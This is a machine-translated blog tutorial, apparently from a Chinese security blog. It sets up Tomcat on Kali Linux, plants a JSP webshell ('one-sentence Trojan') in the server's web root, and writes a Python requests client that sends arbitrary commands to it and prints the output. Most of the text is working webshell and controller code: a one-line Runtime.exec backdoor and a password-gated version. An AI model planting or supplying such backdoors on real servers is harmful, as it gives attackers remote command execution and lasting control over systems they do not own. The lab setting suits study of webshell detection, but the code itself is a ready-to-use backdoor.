Installation is required first tomcat.
Go to official website http://tomcat.apache.org/ Download the corresponding Linux edition .
here , I downloaded it apache-tomcat-8.5.70.tar.gz
It's best to install it in advance JDK1.8 , because kali There may be a problem with the one you bring .
This is the problem I have , I made a note of it .
https://blog.csdn.net/weixin_45254208/article/details/119897865
But you can also not reload , Wait until something goes wrong , What if your computer doesn't have my situation .
Okay , go back to tomcat The installation of .
Extract the downloaded installation package .
tar -zxvf apache-tomcat-8.5.70.tar.gz
The extracted Directory , Move to /usr/local/ Under the table of contents .
then , Use command vim /etc/profile Configure environment variables , If the permission is not enough, add sudo .
Add the following environment variable configuration code at the bottom of the document
export CATALINA_HOME=/usr/local/software/tomcat8.5.70
Use command source /etc/profile Let configuration take effect immediately .
Get into tomcat Installation directory bin Catalog , perform ./startup.sh, Seeing the prompt as shown in the figure indicates that the startup is successful .
And that's the point , The previous steps are installation and configuration .
tomcat The following directory is /usr/local/apache-tomcat-8.5.70/webapps/ROOT , Write a JSP In a word, Trojans , be known as shell.jsp , As shown in the figure below ( I have written it in advance ).
The simplest JSP In a word , Its content is :
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
however , I use another webshell , A little longer .
<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title> In a word, Trojans </title>
</head>
<body>
<%
if ("shell".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>
</html>
among ,shell Is the connection password , Variable cmd For receiving parameters .
stay Windows Verify this machine .
however , Since the title says python Connect , Of course I can't forget .
In fact, the code is very simple , It's nothing more than using python Of requests library , Send a request , Pass parameters , Carry out orders .
import requests
url = str(input(' The goal is URL:')) # http://192.168.223.130:8080/shell.jsp
pwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
while(True):
cmd = str(input(' The order you want to execute :'))
# Pass the command to JSP In a word, Trojans
payload = {
'pwd': '{}'.format(pwd),
'cmd': '{}'.format(cmd)
}
# To the goal url send out post request
response = requests.post(url=url, params=payload)
# Echo the results of command execution
print(response.text)
give the result as follows :
On this basis , You can go a little deeper , Finally developed a webshell Connection management tools , It's not impossible .
If this article is useful to you , Welcome to my collection .
